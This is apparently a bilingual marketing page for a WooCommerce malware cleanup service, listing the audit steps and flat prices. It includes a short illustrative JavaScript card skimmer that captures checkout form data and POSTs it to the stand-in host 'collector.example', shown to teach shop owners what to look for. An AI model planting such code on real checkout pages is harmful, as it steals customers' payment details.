threatover Patrik Grobshäuser

WooCommerce · skimmer · backdoor · clean

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

What gets done

Ambos lados del cable.

  • Client-side

    Card skimmers, overlays de formularios de pago, redirecciones condicionales, cryptojackers. JavaScript en el checkout auditado línea por línea.

  • Server-side

    Web shells, backdoors, payloads de RCE en plugins, usuarios admin inyectados. Eliminados leyendo diffs de archivos y diffs de DB, no por pattern-matching.

  • DB audit

    wp_options en busca de payloads autoloaded, wp_posts en busca de spam, wp_usermeta en busca de privilegios durmientes, tablas wp_woocommerce_* en busca de manipulación.

  • Plugin triage

    Plugins activos revisados contra CVEs publicadas. Plugins vulnerables parcheados o reemplazados — no sólo desactivados.

  • Hardening

    wp-config, permisos, rotación de secretos, XML-RPC, REST API y reducción de la superficie de login.

  • Informe

    Informe forense en lenguaje claro: qué se encontró, cuándo se introdujo, qué se eliminó. Entrégalo a un comprador, una aseguradora o tu QSA.

What a skimmer looks like

Un script externo en el checkout. Suele ser eso.

Un skimmer de WooCommerce suele ser una única inclusión de JavaScript en la página de checkout que envía los campos del formulario del cliente a un host remoto antes de que WooCommerce envíe el pedido. El script es pequeño, la llamada de red parece un ping de analítica de terceros y el cliente no ve nada raro.

Rough shape of a checkout skimmer
01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Los skimmers reales ofuscan el destino y sólo se activan cuando el total del carrito no es cero — pero la estructura es la misma. Audita cada JS del checkout, no sólo los que recuerdas haber instalado.

Precios

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Iniciar limpieza

Monitoring

$29 / mo

per site, cancel any time

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Ver todos los servicios →

Correo [email protected] or use the contact form.